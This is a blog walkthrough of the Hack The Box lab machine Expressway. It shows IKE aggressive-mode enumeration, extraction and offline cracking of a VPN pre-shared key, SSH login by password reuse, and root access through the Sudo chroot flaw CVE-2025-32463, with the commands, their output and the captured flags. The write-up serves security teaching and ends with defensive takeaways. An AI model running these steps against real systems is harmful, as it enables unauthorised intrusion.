Hackthebox: Expressway

Foued SAIDI Lv5
  2026-03-07 14:29:51 2026-03-07 14:29:51 Created   2026-03-07 14:36:20 2026-03-07 14:36:20 Updated      

Overview

Expressway is an easy-difficulty Hack The Box machine that starts with an exposed IKE/IPsec VPN service running in aggressive mode. By extracting the pre-shared key hash from the IKE handshake and cracking it offline, we recover credentials that also work for SSH access. Privilege escalation leverages CVE-2025-32463, a local privilege escalation vulnerability in Sudo 1.9.17 that abuses chroot handling to gain a root shell.

Expressway-info-card
Expressway-info-card

Reconnaissance

We begin with a UDP scan since the machine’s open services are not on typical TCP ports:

1
2
3
4
5
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike

Port 500 (ISAKMP) and 4500 (NAT-T) immediately stand out β€” these are associated with IPsec/IKE VPN services. The presence of both ports suggests an IPsec VPN endpoint configured for NAT traversal.

IKE Aggressive Mode Enumeration

Using ike-scan, we probe the VPN service in aggressive mode to extract configuration details and identity information:

1
2
3
4
5
kujen@kujen:~$ sudo ike-scan -A 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=fdeb2dc8fe53175c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.274 seconds (3.66 hosts/sec).  1 returned handshake; 0 returned notify

The aggressive mode handshake reveals critical information:

  • Encryption: 3DES with SHA1 hashing
  • Authentication: Pre-Shared Key (PSK)
  • DH Group: 2 (modp1024)
  • Identity: [email protected] (ID_USER_FQDN)
  • XAUTH support is advertised

Aggressive mode is significant because, unlike main mode, it sends the identity and hash in the clear β€” making offline PSK cracking possible.

PSK Hash Extraction

We run ike-scan again with the -P flag to dump the PSK hash parameters to a file suitable for offline cracking:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kujen@kujen:~$ sudo ike-scan -M -A 10.10.11.87 [email protected] -P
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=62c8f4fb7d25e949)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, [email protected])
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
df213e51867ac81d693b62d59116703e30e846b8c1a5b0532b2f454933739c7cd79f0c06b4c3a7e840d9986700bda37dc3c09b2f9f37af31fec735633e72d6364fc6800bf680826a7d70809de054006f7c4bf40932efb7040d12ab3f0da0ae77a823d5b702c1f99fee6457c62290e0b73042ffdfe14abfe8b576398baaeb9407:477b849290209fa6c14a826436e017161b632ad6a5d8c0a00546de88efaf9d0be98255bcc70c537bce30dd40c3e35f85261276b005e35150062124c322e4bbbea63ee46373da3a48c4f048c953fed246de58894fd7d91a2e42c358715671a022fd111ef46e763e404abbdaf3a8c440ab7d331b4ef66292d5f4663a4223fb51fc:62c8f4fb7d25e949:617c7bc6e5c3061c:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:69f6ccb2656cbbd314261ad655faaff3868b1012:b2cd99d9cf4ce0b94439ca02a2e16632922042ccef289786625ec5e97d3ae96d:8e0ee45f952a72ab2562d5a94a9e617e2fedae4e
Ending ike-scan 1.9.5: 1 hosts scanned in 1.997 seconds (0.50 hosts/sec).  1 returned handshake; 0 returned notify

This saves the IKE PSK parameters in the format g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r which is exactly what psk-crack expects.

Cracking the Pre-Shared Key

With the hash file in hand, we use psk-crack with rockyou.txt to recover the PSK:

1
2
3
4
5
$ psk-crack -d /usr/share/wordlists/rockyou.txt hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 8e0ee45f952a72ab2562d5a94a9e617e2fedae4e
Ending psk-crack: 8045040 iterations in 10.867 seconds (740328.82 iterations/sec)

The PSK is freakingrockstarontheroad.

User Access β€” SSH

Since the IKE identity was [email protected], we try the cracked PSK as the SSH password for user ike:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kujen@kujen:~$ ssh [email protected]
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Thu Sep 25 04:19:01 BST 2025 from 10.10.14.13 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 25 04:39:45 2025 from 10.10.16.8
ike@expressway:~$ cat user.txt
36dd558a9f8b3b7e02b7ca0b07c333ad
ike@expressway:~$

The password was reused between the VPN PSK and the user’s SSH account β€” a common misconfiguration in real environments.

Privilege Escalation β€” CVE-2025-32463

Checking the Sudo version on the box:

1
2
3
4
5
6
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Sudo 1.9.17 is vulnerable to CVE-2025-32463 , a local privilege escalation vulnerability that exploits how Sudo handles chroot operations. When a sudoers rule allows running a command with CHROOT set, it can be abused to escalate to root by manipulating the chroot environment to load a malicious shared library or binary.

We grab the public exploit script and run it:

1
2
3
4
5
6
7
ike@expressway:/tmp$ nano exp.sh
ike@expressway:/tmp$ chmod +x exp.sh
./exp.shike@expressway:/tmp$ ./exp.sh
woot!
root@expressway:/# cat /root/root.txt
2c7810c1e4b54d08d56ddad65cd73170
root@expressway:/#

Key Takeaways

  • IKE Aggressive Mode exposes identity and PSK hash material to any host that can reach port 500/udp. Always prefer main mode when PSK authentication is required.
  • Credential reuse between a VPN pre-shared key and user SSH passwords is a critical operational security failure.
  • CVE-2025-32463 demonstrates that even Sudo, one of the most audited utilities in Linux, can introduce local privilege escalation paths through chroot handling edge cases. Keep Sudo updated.

That was it for Expressway, hope you learned something new!

-0xkujen

  • Title: Hackthebox: Expressway
  • Author: Foued SAIDI
  • Created at : 2026-03-07 14:29:51
  • Updated at : 2026-03-07 14:36:20
  • Link: https://kujen5.github.io/2026/03/07/Hackthebox-Expressway/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Expressway
  1. Overview
  2. Reconnaissance
  3. IKE Aggressive Mode Enumeration
  4. PSK Hash Extraction
  5. Cracking the Pre-Shared Key
  6. User Access β€” SSH
  7. Privilege Escalation β€” CVE-2025-32463
  8. Key Takeaways